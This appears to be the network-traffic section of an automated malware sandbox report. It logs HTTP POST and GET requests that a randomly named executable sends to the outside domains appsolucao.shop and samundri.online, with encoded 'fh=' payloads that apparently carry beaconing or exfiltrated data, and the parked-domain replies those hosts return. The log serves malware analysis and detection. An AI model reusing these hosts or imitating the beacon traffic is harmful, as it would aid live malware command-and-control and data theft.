                                                                                Data Raw: 66 68 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 4a 37 30 6d 53 6a 59 65 62 30 4d 52 4e 51 38 55 6a 73 66 42 6f 4d 46 62 39 73 54 6f 7a 35 4b 6a 48 56 43 56 35 75 6b 6c 4c 56 50 79 36 6c 70 75 75 76 45 42 50 2f 64 4a 47 4d 49 75 51 70 5a 6f 45 62 47 63 5a 5a 4e 69 56 6c 77 6b 31 51 62 55 45 63 36 33 4e 51 6e 4a 4c 50 75 41 56 75 63 5a 34 56 6d 6d 2f 47 74 7a 53 79 7a 4d 73 69 74 61 54 6d 32 54 33 2b 5a 68 6e 58 67 63 74 71 73 2b 4f 57 41 38 59 71 30 58 31 49 56 6c 38 48 31 79 47 5a 52 49 4d 48 74 2f 6a 64 38 71 51 76 4b 70 42 53 31 53 38 49 36 50 38 4f 33 39 51 67 74 66 44 55 61 57 65 71 53 5a 66 48 61 4e 52 75 38 41 6d 71 79 36 62 6e 6b 75 6a 53 64 47 2f 77 45 54
                                                                                Data Ascii: fh=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5KjHVCV5uklLVPy6lpuuvEBP/dJGMIuQpZoEbGcZZNiVlwk1QbUEc63NQnJLPuAVucZ4Vmm/GtzSyzMsitaTm2T3+ZhnXgctqs+OWA8Yq0X1IVl8H1yGZRIMHt/jd8qQvKpBS1S8I6P8O39QgtfDUaWeqSZfHaNRu8Amqy6bnkujSdG/wET


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.54988384.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:10.620232105 CET1823OUTPOST /8mlm/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.appsolucao.shop
                                                                                Origin: http://www.appsolucao.shop
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.appsolucao.shop/8mlm/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 4f 71 47 65 65 44 47 36 74 74 6b 4e 4a 37 30 6d 53 6a 59 65 62 30 4d 52 4e 51 38 55 6a 73 66 42 6f 4d 46 62 39 73 54 6f 7a 35 53 6a 48 6d 4b 56 34 4a 51 6c 4b 56 50 79 68 46 70 74 75 76 46 64 50 2f 30 68 47 4d 30 2b 51 76 56 6f 45 34 4f 63 63 6f 4e 69 4d 31 77 6b 36 77 62 4a 41 63 36 6d 4e 52 58 4e 4c 4d 47 41 56 75 63 5a 34 56 4b 6d 32 7a 4e 7a 55 79 7a 44 36 79 74 65 58 6d 32 37 33 34 77 61 6e 58 31 6e 74 65 67 2b 4f 79 73 38 64 66 67 58 30 6f 56 6e 37 48 30 68 47 5a 56 58 4d 48 77 4f 6a 63 49 41 51 76 79 70 42 58 46 4a 76 37 57 73 6d 4f 50 42 55 54 6f 7a 64 30 71 79 55 70 2b 34 64 33 2b 71 63 50 63 70 7a 39 65 58 66 6b 70 2f 69 46 68 2b 78 48 74 4f 59 70 2f 64 72 67 75 65 35 48 50 63 4f 7a 63 59 52 6d 4d 71 50 67 42 59 31 6b 53 6a 6a 34 44 54 70 4e 73 7a 74 37 67 67 72 68 64 33 2f 4e 78 65 59 49 54 79 39 31 44 62 75 56 49 7a 4f 4b 68 59 2b 36 4b 4b 2b 78 65 66 6f 42 36 44 48 38 45 2b 42 52 58 30 31 39 4a 45 50 76 79 66 35 42 56 48 7a 6d 6f 5a 79 72 58 6e 37 74 33 58 6a 31 32 38 51 38 4f [TRUNCATED]
                                                                                Data Ascii: fh=OqGeeDG6ttkNJ70mSjYeb0MRNQ8UjsfBoMFb9sToz5SjHmKV4JQlKVPyhFptuvFdP/0hGM0+QvVoE4OccoNiM1wk6wbJAc6mNRXNLMGAVucZ4VKm2zNzUyzD6yteXm2734wanX1nteg+Oys8dfgX0oVn7H0hGZVXMHwOjcIAQvypBXFJv7WsmOPBUTozd0qyUp+4d3+qcPcpz9eXfkp/iFh+xHtOYp/drgue5HPcOzcYRmMqPgBY1kSjj4DTpNszt7ggrhd3/NxeYITy91DbuVIzOKhY+6KK+xefoB6DH8E+BRX019JEPvyf5BVHzmoZyrXn7t3Xj128Q8OawJ1+PjCmrCegy+9Wa6KCcX2qMVrwKJ6zCCHX7365zlhzY4nx95gZ/H6G38J6RMZAawOgqgs9qWmmUUUgaSnmUeNbT4wgEChYs5D6xEdv4ZeIDQ2jwbQdLjQl9d7GOjOVnWC6aUzHnc9fC4Nfq5H43IJ8+X3vHy8O99HTUU/No+KaKKHsaq1TpUdWtSCadEhxnHQIEZvfQLFD3vMq3CDdx1sVu70cz3YcbDhzIrRYf1ISKVAT9K49lgtVofk615DwNVgSl9LsMT4Vdmlu0wKqFymd4e4jgScgD170p8HsQ96psMeM0XVj+M18H9W3bEpmY5WLCnNyndi9qbTF6IwQQWhoExIyzJG0d07/W4ZTuojPxCaKaz+LV/h+xIbWtkBh0Yz5rNuaGIUdDjqrpKZQUiFzd3RBWaiUsLIpT6ewbVbtMG2KPER6Vz1LWEP7W81X0BTPEcuZvlhjOHMfMVTkC+14YzKKSeR/rmNtEjAA65vADapz7cEttJzWsOVowl24yQIDIQpyeT1o5SB/cpVy1DBxDYUaLqLXzmVRekYxRLCiS9x2Rkd8QL+x0T4UxK1vd2zO6rf8Xawf3pNJZDoXfVUoNDfhK12R+qbHzXaB40xbu1kkCozHouhhx/Ef7zZlcABQzQjp2YP3QugqveohJNZm+TeRJaADd [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.54989084.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:13.270989895 CET527OUTGET /8mlm/?jnGlY=dHeXwH1PkJZDr&fh=Dou+d174n903Q5s8eGVlbncTBC0Rpufru8Nex+2NzpzCLkW84PIBEnPU/VIOuudaHO13J+F+WsJAELWMIa4GeHkI0VbuKcGIGxf8Na/XWMFk3HWS90xtCxfW9k4DFGjEgQ== HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.appsolucao.shop
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:14.454948902 CET1236INHTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:22:14 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 0472efbf84949814b621b5ce8c4e12ad-bos-edge1
                                                                                Expires: Tue, 03 Dec 2024 13:22:13 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
                                                                                Dec 3, 2024 14:22:14.455003023 CET1236INData Raw: 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61 63
                                                                                Data Ascii: pen Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600!
                                                                                Dec 3, 2024 14:22:14.455014944 CET1236INData Raw: 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63
                                                                                Data Ascii: ;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-co
                                                                                Dec 3, 2024 14:22:14.455137968 CET1236INData Raw: 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72
                                                                                Data Ascii: :#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-a
                                                                                Dec 3, 2024 14:22:14.455153942 CET1236INData Raw: 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 6d 79 4e 61 76 62 61 72 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6e 61 76 20 6e 61
                                                                                Data Ascii: =120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials
                                                                                Dec 3, 2024 14:22:14.455267906 CET1236INData Raw: 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3e 42 75 79 20 77 65 62 73 69 74 65 20 68 6f 73 74 69 6e 67 20 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73
                                                                                Data Ascii: s=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and user-friendly website hosting for your successful online projects.</p><br><a href=https://www.hosti
                                                                                Dec 3, 2024 14:22:14.455317974 CET1236INData Raw: 64 65 41 74 28 74 2b 2b 29 29 29 29 7b 69 66 28 65 3d 6f 2e 63 68 61 72 43 6f 64 65 41 74 28 74 2b 2b 29 2c 35 35 32 39 36 21 3d 28 36 34 35 31 32 26 72 29 7c 7c 35 36 33 32 30 21 3d 28 36 34 35 31 32 26 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52
                                                                                Data Ascii: deAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023&r)<<10)+(1023&e)+65536}n.push(r)}return n},encode:function(o){for(var r,e=[],n=0,t=o.length;n<t;){i
                                                                                Dec 3, 2024 14:22:14.455331087 CET1236INData Raw: 70 2c 73 3c 28 43 3d 67 3c 3d 69 3f 31 3a 69 2b 32 36 3c 3d 67 3f 32 36 3a 67 2d 69 29 29 62 72 65 61 6b 3b 69 66 28 70 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 72 2f 28 6f 2d 43 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e
                                                                                Data Ascii: p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Math.floor(f/h)>r-a)throw RangeError("punycode_overflow(3)");a+=Math.floor(f/h),f%=h,t&&y.splice(f,0,e.
                                                                                Dec 3, 2024 14:22:14.455342054 CET424INData Raw: 2e 73 70 6c 69 74 28 22 2e 22 29 2c 65 3d 5b 5d 2c 6e 3d 30 3b 6e 3c 72 2e 6c 65 6e 67 74 68 3b 2b 2b 6e 29 7b 76 61 72 20 74 3d 72 5b 6e 5d 3b 65 2e 70 75 73 68 28 74 2e 6d 61 74 63 68 28 2f 5b 5e 41 2d 5a 61 2d 7a 30 2d 39 2d 5d 2f 29 3f 22 78
                                                                                Data Ascii: .split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/^xn--/)?puny


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.54990584.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:20.339613914 CET786OUTPOST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 203
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 67 62 79 68 34 36 74 56 6b 33 6d 6f 77 65 72 32 63 34 39 76 43 4b 36 51 2f 5a 34 77 73 34 43 69 61 4b 56 48 56 33 39 36 32 39 64 74 65 49 6c 30 4a 76 50 47 58 54 46 70 51 78 78 42 56 36 37 75 62 50 70 48 62 4c 38 51 6c 69 6b 37 69 51 62 39 78 47 56 65 4e 75 45 31 70 79 38 77 70 6f 34 54 52 32 6b 4c 55 64 37 61 79 4d 4d 36 4d 34 4a 74 7a 4f 6f 72 59 4e 5a 41 45 61 58 6b 45 36 49 74 56 52 50 43 5a 6e 61 32 37 74 33 79 51 58 38 4a 74 45 70 68 37 38 75 70 42 32 4d 56 65 4a 31 6f 55 4b 48 6a 34 35 53 32 35 4b 6e 48 78 4f 34 62 42 6c 56 5a 6e 4b 2b 59 6b 6c 41 3d
                                                                                Data Ascii: fh=j7AD8YqQlQOrgbyh46tVk3mower2c49vCK6Q/Z4ws4CiaKVHV39629dteIl0JvPGXTFpQxxBV67ubPpHbL8Qlik7iQb9xGVeNuE1py8wpo4TR2kLUd7ayMM6M4JtzOorYNZAEaXkE6ItVRPCZna27t3yQX8JtEph78upB2MVeJ1oUKHj45S25KnHxO4bBlVZnK+YklA=


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.54991384.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:23.004879951 CET806OUTPOST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 223
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 6d 35 6d 68 2f 5a 56 56 7a 48 6d 72 2b 2b 72 32 4c 6f 39 72 43 4b 6d 51 2f 59 4e 33 76 4e 61 69 61 71 46 48 55 30 6c 36 31 39 64 74 47 34 6c 31 4e 76 50 33 58 54 5a 58 51 7a 6c 42 56 36 76 75 62 4b 4e 48 61 38 6f 58 6c 79 6b 6c 38 77 62 37 38 6d 56 65 4e 75 45 31 70 79 59 4b 70 6f 77 54 52 47 55 4c 55 38 37 64 30 38 4d 35 61 6f 4a 74 6b 65 6f 6e 59 4e 5a 75 45 62 62 61 45 34 77 74 56 52 2f 43 59 30 43 33 75 39 33 77 50 6e 39 4e 69 45 49 50 31 4e 43 35 42 47 4a 58 41 4a 70 37 56 38 32 4a 69 62 61 65 71 71 4c 2f 68 64 77 73 51 56 30 77 39 70 75 6f 36 79 55 74 48 4a 54 48 48 74 51 4c 5a 4e 38 72 4e 5a 2f 39 6b 4a 71 52
                                                                                Data Ascii: fh=j7AD8YqQlQOrm5mh/ZVVzHmr++r2Lo9rCKmQ/YN3vNaiaqFHU0l619dtG4l1NvP3XTZXQzlBV6vubKNHa8oXlykl8wb78mVeNuE1pyYKpowTRGULU87d08M5aoJtkeonYNZuEbbaE4wtVR/CY0C3u93wPn9NiEIP1NC5BGJXAJp7V82JibaeqqL/hdwsQV0w9puo6yUtHJTHHtQLZN8rNZ/9kJqR


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.54991984.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:25.677642107 CET1823OUTPOST /3ifu/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.samundri.online
                                                                                Origin: http://www.samundri.online
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: max-age=0
                                                                                Connection: close
                                                                                Content-Length: 1239
                                                                                Referer: http://www.samundri.online/3ifu/
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Data Raw: 66 68 3d 6a 37 41 44 38 59 71 51 6c 51 4f 72 6d 35 6d 68 2f 5a 56 56 7a 48 6d 72 2b 2b 72 32 4c 6f 39 72 43 4b 6d 51 2f 59 4e 33 76 4f 36 69 61 59 39 48 56 56 6c 36 30 39 64 74 59 49 6c 77 4e 76 50 51 58 54 52 4c 51 7a 35 37 56 34 58 75 62 73 52 48 64 4f 51 58 75 79 6b 6c 6d 51 62 36 78 47 56 78 4e 75 55 78 70 79 6f 4b 70 6f 77 54 52 46 63 4c 54 74 37 64 76 38 4d 36 4d 34 4a 78 7a 4f 70 77 59 4e 42 59 45 62 65 68 45 4a 51 74 56 78 76 43 65 47 61 33 7a 4e 33 32 4d 6e 39 72 69 45 45 4d 31 4e 65 31 42 46 56 70 41 4c 70 37 58 4c 62 30 35 61 47 58 77 4b 47 54 73 73 77 5a 42 44 70 58 39 70 76 63 36 69 41 53 47 5a 2f 33 52 62 34 63 56 73 39 39 55 73 37 4e 68 73 54 63 70 73 36 74 42 50 42 74 46 4f 37 59 5a 37 7a 6c 49 51 50 6c 72 73 65 53 36 59 53 38 43 45 6c 53 39 51 66 5a 30 74 74 76 6c 4e 54 32 50 65 49 37 73 50 67 45 47 49 77 37 4a 76 53 4b 64 2b 37 47 75 54 74 37 63 7a 56 33 38 49 68 68 77 35 6e 61 2f 37 66 71 4b 41 6e 44 70 70 65 47 74 61 67 5a 72 69 74 54 57 62 33 61 55 57 72 6c 69 76 4a 43 6d 6f 30 [TRUNCATED]
                                                                                Data Ascii: fh=j7AD8YqQlQOrm5mh/ZVVzHmr++r2Lo9rCKmQ/YN3vO6iaY9HVVl609dtYIlwNvPQXTRLQz57V4XubsRHdOQXuyklmQb6xGVxNuUxpyoKpowTRFcLTt7dv8M6M4JxzOpwYNBYEbehEJQtVxvCeGa3zN32Mn9riEEM1Ne1BFVpALp7XLb05aGXwKGTsswZBDpX9pvc6iASGZ/3Rb4cVs99Us7NhsTcps6tBPBtFO7YZ7zlIQPlrseS6YS8CElS9QfZ0ttvlNT2PeI7sPgEGIw7JvSKd+7GuTt7czV38Ihhw5na/7fqKAnDppeGtagZritTWb3aUWrlivJCmo0HORgbaZyFRq0Q1gGuXmYMLw9AdI5ydvKS9sk30ed20w7DO5GFksF19Rfz/ZTCWfHPQXoSfHHn86H+Pvc7xD90iSSLumUNTIr9LhW8iVBTwz670afdAnawR0Ltknz0j91GmmqSlG39uVB2fTQj2rUipv0hjuH1UfGcWoQWCAM350GLN37hqEGBalpJXAhTpP1o7L9uJl091lsSGlAIZXvP2mDn+MRt868Qn86Cda6D+KoHd96Z+m8uAZ7uueM3gHdzVUAtQMiOujV8RGNTZIk1wtWgjf2QJ4CtPd+ZK1A1h2N8qscSQmda3yCPH4FDbMpWzXA7viP5V8chbMNXw8pzEfYRzQPtRfzknxQeqIsdyVzfG3ueD3rWgwMax6m+h2/lK1ptC0jkmHKd4l1l4v0qCmSso7JwyOzWRPizdZGVzqb6jxip8esEUAhzFogioA8FUZhk5OS5UICsi09tNj5bFbTCy/RsJ0XXpj3YM93PuV01anExsfjH+kKwPlMpL91dHBDMWriuBAydY5CUwBoqlHz5zcmJgOqLnhEZC/bPvcaCWa/+7Ax+ixxi7DYJCqRsfOOo+kDG9dodx9EOFrouqh3cvSnuGfiik1Rdgh2RDwwRpLiOa0RZVe/Gtmq7V+flzubHDTUll1yygro6B0dM6+20ecCogs5sN [TRUNCATED]


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.54992784.32.84.32801536C:\Program Files (x86)\bVGlJJAzVkDFioMCbEyCRzWKvfQjSlzBRBaempAov\BmUrsTIvMw.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Dec 3, 2024 14:22:28.337583065 CET527OUTGET /3ifu/?fh=u5oj/oWevlm54LOT1+Bryx675u+IDrtDZr257qJzt/2kXoBMan19x+0MdpxIfeL/WChZbD4JNYT/SNFPC81SuzkGtTD08CNBMN4l2lkk/418RVw+aNXyvs4RLuFyzfcvLA==&jnGlY=dHeXwH1PkJZDr HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-US
                                                                                Host: www.samundri.online
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                                                                                Dec 3, 2024 14:22:29.470979929 CET1236INHTTP/1.1 200 OK
                                                                                Date: Tue, 03 Dec 2024 13:22:29 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 9973
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Server: hcdn
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                x-hcdn-request-id: 2a39778b58ce54710f7549972affe0d2-bos-edge3
                                                                                Expires: Tue, 03 Dec 2024 13:22:28 GMT
                                                                                Cache-Control: no-cache
                                                                                Accept-Ranges: bytes
                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"O
